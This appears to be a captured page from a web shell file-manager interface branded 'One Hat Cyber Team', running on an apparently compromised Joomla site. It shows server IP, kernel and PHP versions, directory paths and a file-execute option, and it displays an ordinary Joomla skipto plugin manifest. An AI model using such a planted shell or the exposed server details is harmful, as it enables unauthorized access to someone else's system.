One Hat Cyber Team
Your IP :
216.73.216.50
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
cynet
/
www
/
ws.cynet.id
/
plugins
/
system
/
skipto
/
View File Name :
skipto.xml
<?xml version="1.0" encoding="utf-8"?> <extension type="plugin" group="system" method="upgrade"> <name>plg_system_skipto</name> <author>Joomla! Project</author> <creationDate>February 2020</creationDate> <copyright>(C) 2019 Open Source Matters, Inc.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>4.0.0</version> <description>PLG_SYSTEM_SKIPTO_XML_DESCRIPTION</description> <files> <filename plugin="skipto">skipto.php</filename> </files> <languages> <language tag="en-GB">language/en-GB/plg_system_skipto.ini</language> <language tag="en-GB">language/en-GB/plg_system_skipto.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="section" type="list" label="PLG_SYSTEM_SKIPTO_SECTION" default="administrator" validate="options" > <option value="site">PLG_SYSTEM_SKIPTO_SECTION_SITE</option> <option value="administrator">PLG_SYSTEM_SKIPTO_SECTION_ADMIN</option> <option value="both">PLG_SYSTEM_SKIPTO_SECTION_BOTH</option> </field> </fieldset> </fields> </config> </extension>